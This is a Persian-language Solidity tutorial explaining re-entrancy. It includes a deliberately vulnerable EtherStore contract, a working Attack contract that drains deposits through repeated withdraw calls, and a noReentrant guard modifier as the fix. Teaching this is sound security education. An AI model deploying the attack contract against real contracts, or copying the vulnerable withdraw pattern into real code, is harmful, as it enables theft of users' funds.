سالیدیفا

آسیب پذیری Re-Entrancy

فرض کنید قرارداد A قرارداد B رو صدا میزنه.

آسیب پذیری Re-Entrancy (ورود مجدد) به قرارداد B اجازه میده قبل از اینکه اجرای قرارداد A تموم بشه، دوباره A صدا زده بشه.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;

/*
EtherStore is a contract where you can deposit and withdraw ETH.
This contract is vulnerable to re-entrancy attack.
Let's see why.

1. Deploy EtherStore
2. Deposit 1 Ether each from Account 1 (Alice) and Account 2 (Bob) into EtherStore
3. Deploy Attack with address of EtherStore
4. Call Attack.attack sending 1 ether (using Account 3 (Eve)).
  You will get 3 Ethers back (2 Ether stolen from Alice and Bob,
  plus 1 Ether sent from this contract).

What happened?
Attack was able to call EtherStore.withdraw multiple times before
EtherStore.withdraw finished executing.

Here is how the functions were called
- Attack.attack
- EtherStore.deposit
- EtherStore.withdraw
- Attack fallback (receives 1 Ether)
- EtherStore.withdraw
- Attack.fallback (receives 1 Ether)
- EtherStore.withdraw
- Attack fallback (receives 1 Ether)
*/

contract EtherStore {
  mapping(address => uint256) public balances;

  function deposit() public payable {
    balances[msg.sender] += msg.value;
  }

  function withdraw() public {
    uint256 bal = balances[msg.sender];
    require(bal > 0);

    (bool sent,) = msg.sender.call{value: bal}("");
    require(sent, "Failed to send Ether");

    balances[msg.sender] = 0;
  }

  // Helper function to check the balance of this contract
  function getBalance() public view returns (uint256) {
    return address(this).balance;
  }
}

contract Attack {
  EtherStore public etherStore;
  uint256 public constant AMOUNT = 1 ether;

  constructor(address _etherStoreAddress) {
    etherStore = EtherStore(_etherStoreAddress);
  }

  // Fallback is called when EtherStore sends Ether to this contract.
  fallback() external payable {
    if (address(etherStore).balance >= AMOUNT) {
      etherStore.withdraw();
    }
  }

  function attack() external payable {
    require(msg.value >= AMOUNT);
    etherStore.deposit{value: AMOUNT}();
    etherStore.withdraw();
  }

  // Helper function to check the balance of this contract
  function getBalance() public view returns (uint256) {
    return address(this).balance;
  }
}

تکنیک های پیشگیری #

 • مطمعن بشیم قبل از صدا زدن قرارداد خارجی همه تغییرات state اتفاق افتاده
 • با استفاده از function modifiers ها از re-entrancy جلوگیری کنیم

اینجا یه مثال برای جلوگیری از حمله re-entracy میبینیم:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;

contract ReEntrancyGuard {
  bool internal locked;

  modifier noReentrant() {
    require(!locked, "No re-entrancy");
    locked = true;
    _;
    locked = false;
  }
}

توی Remix امتحانش کنین:

احساست در مورد این مقاله چیه؟